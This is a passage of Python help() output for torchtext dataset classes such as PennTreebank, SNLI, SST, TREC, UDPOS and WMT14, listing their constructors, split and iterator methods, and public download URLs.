| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
class PennTreebank(LanguageModelingDataset)
| PennTreebank(path, text_field, newline_eos=True, encoding='utf-8', **kwargs)
|
| The Penn Treebank dataset.
| A relatively small dataset originally created for POS tagging.
|
| References
| ----------
| Marcus, Mitchell P., Marcinkiewicz, Mary Ann & Santorini, Beatrice (1993).
| Building a Large Annotated Corpus of English: The Penn Treebank
|
| Method resolution order:
| PennTreebank
| LanguageModelingDataset
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Class methods defined here:
|
| iters(batch_size=32, bptt_len=35, device=0, root='.data', vectors=None, **kwargs) from builtins.type
| Create iterator objects for splits of the Penn Treebank dataset.
|
| This is the simplest way to use the dataset, and assumes common
| defaults for field, vocabulary, and iterator parameters.
|
| Arguments:
| batch_size: Batch size.
| bptt_len: Length of sequences for backpropagation through time.
| device: Device to create batches on. Use -1 for CPU and None for
| the currently active GPU device.
| root: The root directory where the data files will be stored.
| wv_dir, wv_type, wv_dim: Passed to the Vocab constructor for the
| text field. The word vectors are accessible as
| train.dataset.fields['text'].vocab.vectors.
| Remaining keyword arguments: Passed to the splits method.
|
| splits(text_field, root='.data', train='ptb.train.txt', validation='ptb.valid.txt', test='ptb.test.txt', **kwargs) from builtins.type
| Create dataset objects for splits of the Penn Treebank dataset.
|
| Arguments:
| text_field: The field that will be used for text data.
| root: The root directory where the data files will be stored.
| train: The filename of the train data. Default: 'ptb.train.txt'.
| validation: The filename of the validation data, or None to not
| load the validation set. Default: 'ptb.valid.txt'.
| test: The filename of the test data, or None to not load the test
| set. Default: 'ptb.test.txt'.
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| dirname = ''
|
| name = 'penn-treebank'
|
| urls = ['https://raw.githubusercontent.com/wojzaremba/lstm/master/data...
|
| ----------------------------------------------------------------------
| Methods inherited from LanguageModelingDataset:
|
| __init__(self, path, text_field, newline_eos=True, encoding='utf-8', **kwargs)
| Create a LanguageModelingDataset given a path and a field.
|
| Arguments:
| path: Path to the data file.
| text_field: The field that will be used for text data.
| newline_eos: Whether to add an <eos> token for every newline in the
| data file. Default: True.
| Remaining keyword arguments: Passed to the constructor of
| data.Dataset.
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| ----------------------------------------------------------------------
| Data and other attributes inherited from torchtext.data.dataset.Dataset:
|
| sort_key = None
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
class SNLI(NLIDataset)
| SNLI(path, format, fields, skip_header=False, csv_reader_params={}, **kwargs)
|
| Defines a Dataset of columns stored in CSV, TSV, or JSON format.
|
| Method resolution order:
| SNLI
| NLIDataset
| torchtext.data.dataset.TabularDataset
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Class methods defined here:
|
| splits(text_field, label_field, parse_field=None, root='.data', train='snli_1.0_train.jsonl', validation='snli_1.0_dev.jsonl', test='snli_1.0_test.jsonl') from builtins.type
| Create dataset objects for splits of the SNLI dataset.
|
| This is the most flexible way to use the dataset.
|
| Arguments:
| text_field: The field that will be used for premise and hypothesis
| data.
| label_field: The field that will be used for label data.
| parse_field: The field that will be used for shift-reduce parser
| transitions, or None to not include them.
| extra_fields: A dict[json_key: Tuple(field_name, Field)]
| root: The root directory that the dataset's zip archive will be
| expanded into.
| train: The filename of the train data. Default: 'train.jsonl'.
| validation: The filename of the validation data, or None to not
| load the validation set. Default: 'dev.jsonl'.
| test: The filename of the test data, or None to not load the test
| set. Default: 'test.jsonl'.
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| dirname = 'snli_1.0'
|
| name = 'snli'
|
| urls = ['http://nlp.stanford.edu/projects/snli/snli_1.0.zip']
|
| ----------------------------------------------------------------------
| Class methods inherited from NLIDataset:
|
| iters(batch_size=32, device=0, root='.data', vectors=None, trees=False, **kwargs) from builtins.type
| Create iterator objects for splits of the SNLI dataset.
|
| This is the simplest way to use the dataset, and assumes common
| defaults for field, vocabulary, and iterator parameters.
|
| Arguments:
| batch_size: Batch size.
| device: Device to create batches on. Use -1 for CPU and None for
| the currently active GPU device.
| root: The root directory that the dataset's zip archive will be
| expanded into; therefore the directory in whose wikitext-2
| subdirectory the data files will be stored.
| vectors: one of the available pretrained vectors or a list with each
| element one of the available pretrained vectors (see Vocab.load_vectors)
| trees: Whether to include shift-reduce parser transitions.
| Default: False.
| Remaining keyword arguments: Passed to the splits method.
|
| ----------------------------------------------------------------------
| Static methods inherited from NLIDataset:
|
| sort_key(ex)
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.TabularDataset:
|
| __init__(self, path, format, fields, skip_header=False, csv_reader_params={}, **kwargs)
| Create a TabularDataset given a path, file format, and field list.
|
| Arguments:
| path (str): Path to the data file.
| format (str): The format of the data file. One of "CSV", "TSV", or
| "JSON" (case-insensitive).
| fields (list(tuple(str, Field)) or dict[str: tuple(str, Field)]:
| If using a list, the format must be CSV or TSV, and the values of the list
| should be tuples of (name, field).
| The fields should be in the same order as the columns in the CSV or TSV
| file, while tuples of (name, None) represent columns that will be ignored.
|
| If using a dict, the keys should be a subset of the JSON keys or CSV/TSV
| columns, and the values should be tuples of (name, field).
| Keys not present in the input dictionary are ignored.
| This allows the user to rename columns from their JSON/CSV/TSV key names
| and also enables selecting a subset of columns to load.
| skip_header (bool): Whether to skip the first line of the input file.
| csv_reader_params(dict): Parameters to pass to the csv reader.
| Only relevant when format is csv or tsv.
| See
| https://docs.python.org/3/library/csv.html#csv.reader
| for more details.
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
class SST(torchtext.data.dataset.Dataset)
| SST(path, text_field, label_field, subtrees=False, fine_grained=False, **kwargs)
|
| Defines a dataset composed of Examples along with its Fields.
|
| Attributes:
| sort_key (callable): A key to use for sorting dataset examples for batching
| together examples with similar lengths to minimize padding.
| examples (list(Example)): The examples in this dataset.
| fields (dict[str, Field]): Contains the name of each column or field, together
| with the corresponding Field object. Two fields with the same Field object
| will have a shared vocabulary.
|
| Method resolution order:
| SST
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Methods defined here:
|
| __init__(self, path, text_field, label_field, subtrees=False, fine_grained=False, **kwargs)
| Create an SST dataset instance given a path and fields.
|
| Arguments:
| path: Path to the data file
| text_field: The field that will be used for text data.
| label_field: The field that will be used for label data.
| subtrees: Whether to include sentiment-tagged subphrases
| in addition to complete examples. Default: False.
| fine_grained: Whether to use 5-class instead of 3-class
| labeling. Default: False.
| Remaining keyword arguments: Passed to the constructor of
| data.Dataset.
|
| ----------------------------------------------------------------------
| Class methods defined here:
|
| iters(batch_size=32, device=0, root='.data', vectors=None, **kwargs) from builtins.type
| Create iterator objects for splits of the SST dataset.
|
| Arguments:
| batch_size: Batch_size
| device: Device to create batches on. Use - 1 for CPU and None for
| the currently active GPU device.
| root: The root directory that the dataset's zip archive will be
| expanded into; therefore the directory in whose trees
| subdirectory the data files will be stored.
| vectors: one of the available pretrained vectors or a list with each
| element one of the available pretrained vectors (see Vocab.load_vectors)
| Remaining keyword arguments: Passed to the splits method.
|
| splits(text_field, label_field, root='.data', train='train.txt', validation='dev.txt', test='test.txt', train_subtrees=False, **kwargs) from builtins.type
| Create dataset objects for splits of the SST dataset.
|
| Arguments:
| text_field: The field that will be used for the sentence.
| label_field: The field that will be used for label data.
| root: The root directory that the dataset's zip archive will be
| expanded into; therefore the directory in whose trees
| subdirectory the data files will be stored.
| train: The filename of the train data. Default: 'train.txt'.
| validation: The filename of the validation data, or None to not
| load the validation set. Default: 'dev.txt'.
| test: The filename of the test data, or None to not load the test
| set. Default: 'test.txt'.
| train_subtrees: Whether to use all subtrees in the training set.
| Default: False.
| Remaining keyword arguments: Passed to the splits method of
| Dataset.
|
| ----------------------------------------------------------------------
| Static methods defined here:
|
| sort_key(ex)
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| dirname = 'trees'
|
| name = 'sst'
|
| urls = ['http://nlp.stanford.edu/sentiment/trainDevTestTrees_PTB.zip']
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
class SequenceTaggingDataset(torchtext.data.dataset.Dataset)
| SequenceTaggingDataset(path, fields, encoding='utf-8', separator='\t', **kwargs)
|
| Defines a dataset for sequence tagging. Examples in this dataset
| contain paired lists -- paired list of words and tags.
|
| For example, in the case of part-of-speech tagging, an example is of the
| form
| [I, love, PyTorch, .] paired with [PRON, VERB, PROPN, PUNCT]
|
| See torchtext/test/sequence_tagging.py on how to use this class.
|
| Method resolution order:
| SequenceTaggingDataset
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Methods defined here:
|
| __init__(self, path, fields, encoding='utf-8', separator='\t', **kwargs)
| Create a dataset from a list of Examples and Fields.
|
| Arguments:
| examples: List of Examples.
| fields (List(tuple(str, Field))): The Fields to use in this tuple. The
| string is a field name, and the Field is the associated field.
| filter_pred (callable or None): Use only examples for which
| filter_pred(example) is True, or use all examples if None.
| Default is None.
|
| ----------------------------------------------------------------------
| Static methods defined here:
|
| sort_key(example)
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| splits(path=None, root='.data', train=None, validation=None, test=None, **kwargs) from builtins.type
| Create Dataset objects for multiple splits of a dataset.
|
| Arguments:
| path (str): Common prefix of the splits' file paths, or None to use
| the result of cls.download(root).
| root (str): Root dataset storage directory. Default is '.data'.
| train (str): Suffix to add to path for the train set, or None for no
| train set. Default is None.
| validation (str): Suffix to add to path for the validation set, or None
| for no validation set. Default is None.
| test (str): Suffix to add to path for the test set, or None for no test
| set. Default is None.
| Remaining keyword arguments: Passed to the constructor of the
| Dataset (sub)class being used.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if provided.
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
class TREC(torchtext.data.dataset.Dataset)
| TREC(path, text_field, label_field, fine_grained=False, **kwargs)
|
| Defines a dataset composed of Examples along with its Fields.
|
| Attributes:
| sort_key (callable): A key to use for sorting dataset examples for batching
| together examples with similar lengths to minimize padding.
| examples (list(Example)): The examples in this dataset.
| fields (dict[str, Field]): Contains the name of each column or field, together
| with the corresponding Field object. Two fields with the same Field object
| will have a shared vocabulary.
|
| Method resolution order:
| TREC
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Methods defined here:
|
| __init__(self, path, text_field, label_field, fine_grained=False, **kwargs)
| Create an TREC dataset instance given a path and fields.
|
| Arguments:
| path: Path to the data file.
| text_field: The field that will be used for text data.
| label_field: The field that will be used for label data.
| fine_grained: Whether to use the fine-grained (50-class) version of TREC
| or the coarse grained (6-class) version.
| Remaining keyword arguments: Passed to the constructor of
| data.Dataset.
|
| ----------------------------------------------------------------------
| Class methods defined here:
|
| iters(batch_size=32, device=0, root='.data', vectors=None, **kwargs) from builtins.type
| Create iterator objects for splits of the TREC dataset.
|
| Arguments:
| batch_size: Batch_size
| device: Device to create batches on. Use - 1 for CPU and None for
| the currently active GPU device.
| root: The root directory that contains the trec dataset subdirectory
| vectors: one of the available pretrained vectors or a list with each
| element one of the available pretrained vectors (see Vocab.load_vectors)
| Remaining keyword arguments: Passed to the splits method.
|
| splits(text_field, label_field, root='.data', train='train_5500.label', test='TREC_10.label', **kwargs) from builtins.type
| Create dataset objects for splits of the TREC dataset.
|
| Arguments:
| text_field: The field that will be used for the sentence.
| label_field: The field that will be used for label data.
| root: Root dataset storage directory. Default is '.data'.
| train: The filename of the train data. Default: 'train_5500.label'.
| test: The filename of the test data, or None to not load the test
| set. Default: 'TREC_10.label'.
| Remaining keyword arguments: Passed to the splits method of
| Dataset.
|
| ----------------------------------------------------------------------
| Static methods defined here:
|
| sort_key(ex)
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| dirname = ''
|
| name = 'trec'
|
| urls = ['http://cogcomp.org/Data/QA/QC/train_5500.label', 'http://cogc...
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
class TextClassificationDataset(torch.utils.data.dataset.Dataset)
| TextClassificationDataset(vocab, data, labels)
|
| Defines an abstract text classification datasets.
| Currently, we only support the following datasets:
|
| - AG_NEWS
| - SogouNews
| - DBpedia
| - YelpReviewPolarity
| - YelpReviewFull
| - YahooAnswers
| - AmazonReviewPolarity
| - AmazonReviewFull
|
| Method resolution order:
| TextClassificationDataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Methods defined here:
|
| __getitem__(self, i)
|
| __init__(self, vocab, data, labels)
| Initiate text-classification dataset.
|
| Arguments:
| vocab: Vocabulary object used for dataset.
| data: a list of label/tokens tuple. tokens are a tensor after
| numericalizing the string tokens. label is an integer.
| [(label1, tokens1), (label2, tokens2), (label2, tokens3)]
| label: a set of the labels.
| {label1, label2}
|
| Examples:
| See the examples in examples/text_classification/
|
| __iter__(self)
|
| __len__(self)
|
| get_labels(self)
|
| get_vocab(self)
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
class TranslationDataset(torchtext.data.dataset.Dataset)
| TranslationDataset(path, exts, fields, **kwargs)
|
| Defines a dataset for machine translation.
|
| Method resolution order:
| TranslationDataset
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Methods defined here:
|
| __init__(self, path, exts, fields, **kwargs)
| Create a TranslationDataset given paths and fields.
|
| Arguments:
| path: Common prefix of paths to the data files for both languages.
| exts: A tuple containing the extension to path for each language.
| fields: A tuple containing the fields that will be used for data
| in each language.
| Remaining keyword arguments: Passed to the constructor of
| data.Dataset.
|
| ----------------------------------------------------------------------
| Class methods defined here:
|
| splits(exts, fields, path=None, root='.data', train='train', validation='val', test='test', **kwargs) from builtins.type
| Create dataset objects for splits of a TranslationDataset.
|
| Arguments:
| exts: A tuple containing the extension to path for each language.
| fields: A tuple containing the fields that will be used for data
| in each language.
| path (str): Common prefix of the splits' file paths, or None to use
| the result of cls.download(root).
| root: Root dataset storage directory. Default is '.data'.
| train: The prefix of the train data. Default: 'train'.
| validation: The prefix of the validation data. Default: 'val'.
| test: The prefix of the test data. Default: 'test'.
| Remaining keyword arguments: Passed to the splits method of
| Dataset.
|
| ----------------------------------------------------------------------
| Static methods defined here:
|
| sort_key(ex)
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
class UDPOS(SequenceTaggingDataset)
| UDPOS(path, fields, encoding='utf-8', separator='\t', **kwargs)
|
| Defines a dataset for sequence tagging. Examples in this dataset
| contain paired lists -- paired list of words and tags.
|
| For example, in the case of part-of-speech tagging, an example is of the
| form
| [I, love, PyTorch, .] paired with [PRON, VERB, PROPN, PUNCT]
|
| See torchtext/test/sequence_tagging.py on how to use this class.
|
| Method resolution order:
| UDPOS
| SequenceTaggingDataset
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Class methods defined here:
|
| splits(fields, root='.data', train='en-ud-tag.v2.train.txt', validation='en-ud-tag.v2.dev.txt', test='en-ud-tag.v2.test.txt', **kwargs) from builtins.type
| Downloads and loads the Universal Dependencies Version 2 POS Tagged
| data.
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| dirname = 'en-ud-v2'
|
| name = 'udpos'
|
| urls = ['https://bitbucket.org/sivareddyg/public/downloads/en-ud-v2.zi...
|
| ----------------------------------------------------------------------
| Methods inherited from SequenceTaggingDataset:
|
| __init__(self, path, fields, encoding='utf-8', separator='\t', **kwargs)
| Create a dataset from a list of Examples and Fields.
|
| Arguments:
| examples: List of Examples.
| fields (List(tuple(str, Field))): The Fields to use in this tuple. The
| string is a field name, and the Field is the associated field.
| filter_pred (callable or None): Use only examples for which
| filter_pred(example) is True, or use all examples if None.
| Default is None.
|
| ----------------------------------------------------------------------
| Static methods inherited from SequenceTaggingDataset:
|
| sort_key(example)
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
class WMT14(TranslationDataset)
| WMT14(path, exts, fields, **kwargs)
|
| The WMT 2014 English-German dataset, as preprocessed by Google Brain.
|
| Though this download contains test sets from 2015 and 2016, the train set
| differs slightly from WMT 2015 and 2016 and significantly from WMT 2017.
|
| Method resolution order:
| WMT14
| TranslationDataset
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Class methods defined here:
|
| splits(exts, fields, root='.data', train='train.tok.clean.bpe.32000', validation='newstest2013.tok.bpe.32000', test='newstest2014.tok.bpe.32000', **kwargs) from builtins.type
| Create dataset objects for splits of the WMT 2014 dataset.
|
| Arguments:
| exts: A tuple containing the extensions for each language. Must be
| either ('.en', '.de') or the reverse.
| fields: A tuple containing the fields that will be used for data
| in each language.
| root: Root dataset storage directory. Default is '.data'.
| train: The prefix of the train data. Default:
| 'train.tok.clean.bpe.32000'.
| validation: The prefix of the validation data. Default:
| 'newstest2013.tok.bpe.32000'.
| test: The prefix of the test data. Default:
| 'newstest2014.tok.bpe.32000'.
| Remaining keyword arguments: Passed to the splits method of
| Dataset.
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| dirname = ''
|
| name = 'wmt14'
|
| urls = [('https://drive.google.com/uc?export=download&id=0B_bZck-ksdkp...
|
| ----------------------------------------------------------------------
| Methods inherited from TranslationDataset:
|
| __init__(self, path, exts, fields, **kwargs)
| Create a TranslationDataset given paths and fields.
|
| Arguments:
| path: Common prefix of paths to the data files for both languages.
| exts: A tuple containing the extension to path for each language.
| fields: A tuple containing the fields that will be used for data
| in each language.
| Remaining keyword arguments: Passed to the constructor of
| data.Dataset.
|
| ----------------------------------------------------------------------
| Static methods inherited from TranslationDataset:
|
| sort_key(ex)
|
| ----------------------------------------------------------------------
